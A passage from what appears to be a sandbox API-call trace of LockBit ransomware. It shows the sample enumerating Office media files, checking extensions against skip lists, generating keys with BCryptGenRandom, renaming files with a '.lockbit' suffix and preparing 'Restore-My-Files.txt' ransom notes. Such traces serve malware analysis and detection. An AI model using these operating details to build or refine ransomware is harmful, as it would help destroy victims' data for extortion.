Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18191_.WMF") returned=".WMF" [0199.782] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.782] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.782] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.783] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.783] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18191_.WMF.lockbit") returned 79 [0199.783] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18191_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18191_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0199.785] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.785] malloc (_Size=0x40068) returned 0x1ff1e60 [0199.785] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3230) returned 1 [0199.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.785] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0199.786] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0199.786] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.789] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18191_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18191_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.790] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.790] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.791] free (_Block=0x1fa2ed8) [0199.791] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18191_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.791] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.791] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.791] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6432a00, ftCreationTime.dwHighDateTime=0x1bdcf20, ftLastAccessTime.dwLowDateTime=0xbcb8d7a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb6432a00, ftLastWriteTime.dwHighDateTime=0x1bdcf20, nFileSizeHigh=0x0, nFileSizeLow=0x2068, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18192_.WMF", cAlternateFileName="")) returned 1 [0199.791] lstrcmpiW (lpString1=".", lpString2="BD18192_.WMF") returned -1 [0199.792] lstrcmpiW (lpString1="..", lpString2="BD18192_.WMF") returned -1 [0199.792] PathFindExtensionW (pszPath="BD18192_.WMF") returned=".WMF" [0199.792] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.792] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.793] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.793] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18192_.WMF") returned 1 [0199.794] lstrcmpiW (lpString1="ntldr", lpString2="BD18192_.WMF") returned 1 [0199.794] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18192_.WMF") returned 1 [0199.794] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18192_.WMF") returned 1 [0199.794] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18192_.WMF") returned -1 [0199.794] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18192_.WMF") returned 1 [0199.794] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18192_.WMF") returned 1 [0199.794] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.794] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18192_.WMF") returned=".WMF" [0199.794] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.794] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.794] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.795] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.795] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.795] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.795] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.795] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.795] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.795] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.795] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.795] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.795] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.795] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.795] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.795] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18192_.WMF.lockbit") returned 79 [0199.795] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18192_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18192_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0199.800] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.800] malloc (_Size=0x40068) returned 0x3d70450 [0199.801] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=8296) returned 1 [0199.801] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.801] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0199.801] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.802] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0199.802] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.804] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18192_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18192_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.804] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.804] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.806] free (_Block=0x1fa2ed8) [0199.806] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18192_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.806] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.806] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.806] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd07d0800, ftCreationTime.dwHighDateTime=0x1bdcf20, ftLastAccessTime.dwLowDateTime=0xbcb8d7a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd07d0800, ftLastWriteTime.dwHighDateTime=0x1bdcf20, nFileSizeHigh=0x0, nFileSizeLow=0x128e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18193_.WMF", cAlternateFileName="")) returned 1 [0199.806] lstrcmpiW (lpString1=".", lpString2="BD18193_.WMF") returned -1 [0199.806] lstrcmpiW (lpString1="..", lpString2="BD18193_.WMF") returned -1 [0199.806] PathFindExtensionW (pszPath="BD18193_.WMF") returned=".WMF" [0199.806] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.806] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.806] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.807] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.808] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.808] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.809] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.809] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18193_.WMF") returned 1 [0199.809] lstrcmpiW (lpString1="ntldr", lpString2="BD18193_.WMF") returned 1 [0199.809] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18193_.WMF") returned 1 [0199.809] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18193_.WMF") returned 1 [0199.809] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18193_.WMF") returned -1 [0199.809] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18193_.WMF") returned 1 [0199.809] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18193_.WMF") returned 1 [0199.809] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.809] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18193_.WMF") returned=".WMF" [0199.809] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.809] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.809] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.809] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.809] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.809] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.809] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.809] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.809] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.809] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.809] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.809] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.809] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.810] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.810] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18193_.WMF.lockbit") returned 79 [0199.810] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18193_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18193_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0199.812] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.812] malloc (_Size=0x40068) returned 0x3f70048 [0199.812] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=4750) returned 1 [0199.812] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.813] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0199.813] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.813] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0199.813] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0199.852] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18193_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18193_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.852] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.861] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0199.861] free (_Block=0x1fa2ed8) [0199.861] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18193_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.861] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.862] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.866] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29e33800, ftCreationTime.dwHighDateTime=0x1bdcf1d, ftLastAccessTime.dwLowDateTime=0xbcb8d7a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x29e33800, ftLastWriteTime.dwHighDateTime=0x1bdcf1d, nFileSizeHigh=0x0, 